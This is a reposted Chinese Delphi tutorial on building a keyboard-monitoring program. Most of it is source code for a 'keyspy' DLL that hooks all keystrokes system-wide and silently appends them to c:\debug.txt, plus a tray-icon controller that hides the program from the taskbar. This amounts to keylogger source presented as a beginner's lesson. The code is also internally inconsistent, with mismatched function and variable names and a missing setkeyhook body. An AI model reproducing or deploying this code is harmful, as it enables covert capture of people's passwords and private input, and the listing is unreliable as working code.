利用Hook技术实现键盘监控
----在許多系統(tǒng)中,出于安全或其它原因,常常要求隨時(shí)對(duì)鍵盤進(jìn)行監(jiān)控,一個(gè)專業(yè)的監(jiān)控程序必須具備兩點(diǎn),一是實(shí)時(shí);二是作為指示圖標(biāo)運(yùn)行。實(shí)際應(yīng)用中把利用Hook(即鉤子)技術(shù)編寫的應(yīng)用程序添加到Windows的任務(wù)欄的指示區(qū)中就能夠很好的達(dá)到這個(gè)目的。我在參考了API幫助文檔基礎(chǔ)上,根據(jù)在Delphi開發(fā)環(huán)境中的具體實(shí)現(xiàn)分別對(duì)這兩部分進(jìn)行詳細(xì)論述。
一、Hook(鉤子)的實(shí)現(xiàn):
Hook是應(yīng)用程序在Microsoft Windows 消息處理過程中設(shè)置的用來監(jiān)控消息流并且處理系統(tǒng)中尚未到達(dá)目的窗口的某一類型消息過程的機(jī)制。如果Hook過程在應(yīng)用程序中實(shí)現(xiàn),若應(yīng)用程序不是當(dāng)前窗口時(shí),該Hook就不起作用;如果Hook在DLL中實(shí)現(xiàn),程序在運(yùn)行中動(dòng)態(tài)調(diào)用它,它能實(shí)時(shí)對(duì)系統(tǒng)進(jìn)行監(jiān)控。根據(jù)需要,我們采用的是在DLL中實(shí)現(xiàn)Hook的方式。
1.新建一個(gè)導(dǎo)出兩個(gè)函數(shù)的DLL文件,在hookproc.pas中定義了鉤子具體實(shí)現(xiàn)過程。 代碼如下:
library keyspy;
uses windows, messages, hookproc in 'hookproc.pas';
exports setkeyhook, endkeyhook;
begin nexthookproc:=0;
procsaveexit:=exitproc;
exitproc:=@keyhookexit;
end.
2.在Hookproc.pas中實(shí)現(xiàn)了鉤子具體過程:
unit hookproc;
interface uses Windows, Messages, SysUtils, Controls, StdCtrls;
var nexthookproc:hhook;
procsaveexit:pointer;
function keyboardhook(icode:integer;wparam:wparam;lparam:lparam):lresult;
stdcall;
export;
function setkeyhook:bool;export;//加載鉤子
function endkeyhook:bool;export;//卸載鉤子
procedure keyhookexit;
far;
const afilename='c:\debug.txt';//將鍵盤輸入動(dòng)作寫入文件中
var debugfile:textfile;
implementation function keyboardhookhandler(icode:integer;wparam:wparam; lparam:lparam):lresult;
stdcall;
export;
begin if icode<0 then
begin result:=callnexthookex(hnexthookproc,icode,wparam,lparam);
exit;
end;
assignfile(debugfile,afilename);
append(debugfile);
if getkeystate(vk_return)<0 then
begin writeln(debugfile,'');
write(debugfile,char(wparam));
end
else write(debugfile,char(wparam));
closefile(debugfile);
result:=0;
end;
function endkeyhook:bool;
export;
begin if nexthookproc<>0 then
begin unhookwindowshookex(nexthookproc);
nexthookproc:=0;
messagebeep(0);
end;
result:=hnexthookproc=0;
end;
procedure keyhookexit;
far;
begin if nexthookproc<>0 then
endkeyhook;
exitproc:=procsaveexit;
end;
end.
二、Win95/98使用任務(wù)欄右方指示區(qū)來顯示應(yīng)用程序或工具圖標(biāo)對(duì)指示區(qū)圖標(biāo)的操作涉及了一個(gè)API函數(shù)Shell_NotifyIcon,它有兩個(gè)參數(shù),一個(gè)是指向TnotifyIconData結(jié)構(gòu)的指針,另一個(gè)是要添加、刪除、改動(dòng)圖標(biāo)的標(biāo)志。通過該函函數(shù)將應(yīng)用程序的圖標(biāo)添加到指示區(qū)中,使其作為圖標(biāo)運(yùn)行,增加專業(yè)特色。當(dāng)程序起動(dòng)后,用鼠標(biāo)右鍵點(diǎn)擊圖標(biāo),則彈出一個(gè)菜單,可選擇sethook或endhook。
unit kb;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, Menus,shellapi;
const icon_id=1;
MI_iconevent=wm_user+1;//定義一個(gè)用戶消息
type
TForm1 = class(TForm)
PopupMenu1: TPopupMenu;
sethook1: TMenuItem;
endhook1: TMenuItem;
N1: TMenuItem;
About1: TMenuItem;
Close1: TMenuItem;
Gettext1: TMenuItem;
procedure FormCreate(Sender: TObject);
procedure sethook1Click(Sender: TObject);
procedure endhook1Click(Sender: TObject);
procedure FormDestroy(Sender: TObject);
procedure Close1Click(Sender: TObject);
private
{ Private declarations }
nid:tnotifyicondata;
normalicon:ticon;
public
{ Public declarations }
procedure icontray(var msg:tmessage);
message mi_iconevent;
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
function setkeyhook:bool;
external 'keyspy.dll';
function endkeyhook:bool;
external 'keyspy.dll';
procedure tform1.icontray(var msg:tmessage);
var
pt:tpoint;
begin
if msg.lparam=wm_lbuttondown then
sethook1click(self);
if msg.LParam=wm_rbuttondown then
begin
getcursorpos(pt);
setforegroundwindow(handle);
popupmenu1.popup(pt.x,pt.y);
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
normalicon:=ticon.create;
application.title:=caption;
nid.cbsize:=sizeof(nid);
nid.wnd:=handle;
nid.uid:=icon_id;
nid.uflags:=nif_icon or nif_message or nif_tip;
nid.ucallbackmessage:=mi_iconevent;
nid.hIcon :=normalicon.handle;
strcopy(nid.sztip,pchar(caption));
nid.uFlags:=nif_message or nif_icon or nif_tip; shell_notifyicon(nim_add,@nid);
SetWindowLong(Application.Handle, GWL_EXSTYLE,WS_EX_TOOLWINDOW);
end;
procedure TForm1.sethook1Click(Sender: TObject);
begin setkeyhook;
end;
procedure TForm1.endhook1Click(Sender: TObject);
begin endkeyhook;
end;
procedure TForm1.FormDestroy(Sender: TObject);
begin nid.uFlags :=0;
shell_notifyicon(nim_delete,@nid);
end;
procedure TForm1.Close1Click(Sender: TObject);
begin application.terminate;
end;
該程序雖然只用了幾個(gè)shellai函數(shù),但是它涉及到了在Delphi中對(duì)DLL的引用、鉤子實(shí)現(xiàn)、對(duì)指示區(qū)的操作、用戶定義消息的處理、文件的讀寫等比較重要的內(nèi)容,我相信這篇文章能對(duì)許多Delphi的初學(xué)者有所幫助。
轉(zhuǎn)載于:https://www.cnblogs.com/myamanda/articles/1597574.html
總結(jié)
以上是生活随笔為你收集整理的利用Hook技术实现键盘监控的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 冉莹颖与邹市明的有情人终成眷属
- 下一篇: 【转】桌面快捷方式不见了的解决办法